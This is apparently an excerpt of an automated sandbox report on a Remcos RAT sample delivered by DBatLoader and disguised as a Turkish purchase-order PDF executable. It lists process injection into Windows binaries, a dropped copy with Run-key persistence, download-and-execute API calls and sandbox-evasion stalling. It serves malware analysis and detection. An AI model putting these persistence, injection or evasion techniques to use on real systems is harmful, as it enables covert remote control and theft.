                    Source: unknownProcess created: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe "C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe"
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeProcess created: C:\Windows\SysWOW64\logagent.exe C:\Windows\System32\logagent.exe
                    Source: unknownProcess created: C:\Users\Public\Libraries\Eluiezilfw.exe "C:\Users\Public\Libraries\Eluiezilfw.exe"
                    Source: unknownProcess created: C:\Users\Public\Libraries\Eluiezilfw.exe "C:\Users\Public\Libraries\Eluiezilfw.exe"
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeProcess created: C:\Windows\SysWOW64\logagent.exe C:\Windows\System32\logagent.exe
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeProcess created: C:\Windows\SysWOW64\DpiScaling.exe C:\Windows\System32\DpiScaling.exe
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeProcess created: C:\Windows\SysWOW64\logagent.exe C:\Windows\System32\logagent.exeJump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeProcess created: C:\Windows\SysWOW64\logagent.exe C:\Windows\System32\logagent.exeJump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeProcess created: C:\Windows\SysWOW64\DpiScaling.exe C:\Windows\System32\DpiScaling.exeJump to behavior
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: 3_2_0040EC0F GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,3_2_0040EC0F
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: 3_2_1055059E GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,3_2_1055059E
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\Eluiezilfwmdrgrdfrqpnwmurrnwnhm[1]Jump to behavior
                    Source: classification engineClassification label: mal100.rans.troj.spyw.expl.evad.winEXE@9/5@19/5
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: 3_2_00411927 OpenSCManagerW,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,OpenServiceW,CloseServiceHandle,ChangeServiceConfigW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,3_2_00411927
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: 3_2_00409A2F GetModuleFileNameW,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,CloseHandle,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@0@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,Process32NextW,??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@ABV12@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,CloseHandle,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIPBGI@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,wcslen,?replace@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@IIPBG@Z,??8std@@YA_NPBGABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,CreateMutexA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,CloseHandle,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,3_2_00409A2F
                    Source: C:\Windows\SysWOW64\logagent.exeMutant created: \Sessions\1\BaseNamedObjects\Remcos-MZPAVR
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: 3_2_00409D02 FindResourceA,LoadResource,LockResource,SizeofResource,3_2_00409D02
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\SysWOW64\logagent.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\SysWOW64\logagent.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected

                    Data Obfuscation

                    barindex
                    Yara detected DBatLoader
                    Source: Yara matchFile source: Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe, type: SAMPLE
                    Source: Yara matchFile source: 0.2.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.Eluiezilfw.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.0.Eluiezilfw.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.Eluiezilfw.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.0.Eluiezilfw.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000008.00000002.344209783.0000000000401000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.347399894.0000000003760000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.360030568.00000000031A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.346405704.00000000031A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.315120211.0000000003610000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.306973875.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000000.326994994.0000000000401000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.316837700.000000007FD20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.349121751.000000007FD20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000000.309996740.0000000000401000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.317153227.000000007FDD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.312930120.0000000003050000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.361029837.000000007FDD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.360948526.000000007FD20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.358808877.0000000000401000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.349277729.000000007FDD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.360296603.0000000003760000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000000.259960102.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: C:\Users\Public\Libraries\Eluiezilfw.exe, type: DROPPED
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeCode function: 0_3_036E5FFF push 090D2120h; retf 0_3_036E60C9
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeCode function: 0_3_036E5F96 push 090D2120h; retf 0_3_036E60C9
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeCode function: 0_3_036E5E3E push 090D2120h; retf 0_3_036E60C9
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeCode function: 0_3_036E580B push ebp; iretd 0_3_036E580C
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeCode function: 0_3_036E581C push ebp; iretd 0_3_036E581D
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeCode function: 0_3_036E54D6 push ebp; iretd 0_3_036E5510
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeCode function: 0_3_038D2098 push edx; ret 0_3_038D20A0
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: 3_2_0041BE7A push cs; ret 3_2_0041BE7B
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: 3_2_00413ED0 push eax; ret 3_2_00413EFE
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: 3_2_0041B326 push cs; ret 3_2_0041B327
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: 3_2_1055585F push eax; ret 3_2_1055588D
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: 3_2_10541040 push ss; retf 3_2_10541002
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: 3_2_1055E44C push es; retf 3_2_1055E460
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: 3_2_00409908 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,3_2_00409908
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeFile created: C:\Users\Public\Libraries\Eluiezilfw.exeJump to dropped file
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: 3_2_0040D4E5 ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,URLDownloadToFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,ShellExecuteW,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,free,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,3_2_0040D4E5
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: 3_2_00411700 OpenSCManagerW,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,3_2_00411700
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run EluiezilfwJump to behavior
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run EluiezilfwJump to behavior
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: 3_2_00409908 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,3_2_00409908
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\logagent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Eluiezilfw.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Found stalling execution ending in API Sleep call
                    Source: C:\Windows\SysWOW64\logagent.exeStalling execution: Execution stalls by calling Sleepgraph_3-16374
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: OpenSCManagerA,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z,EnumServicesStatusW,EnumServicesStatusW,GetLastError,malloc,EnumServicesStatusW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,OpenServiceW,QueryServiceConfigW,GetLastError,malloc,QueryServiceConfigW,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,free,CloseServiceHandle,free,CloseServiceHandle,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,3_2_004113C9
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: 3_2_00405156 GetKeyboardLayout followed by cmp: cmp ax, cx and CTI: je 0040517Bh3_2_00405156
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: 3_2_00405156 GetKeyboardLayout followed by cmp: cmp ax, dx and CTI: jne 0040517Bh3_2_00405156
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: 3_2_10546AE5 GetKeyboardLayout followed by cmp: cmp ax, cx and CTI: je 10546B0Ah3_2_10546AE5
                    Source: C:\Windows\SysWOW64\logagent.exeCode function: 3_2_10546AE5 GetKeyboardLayout followed by cmp: cmp ax, dx and CTI: jne 10546B0Ah3_2_10546AE5
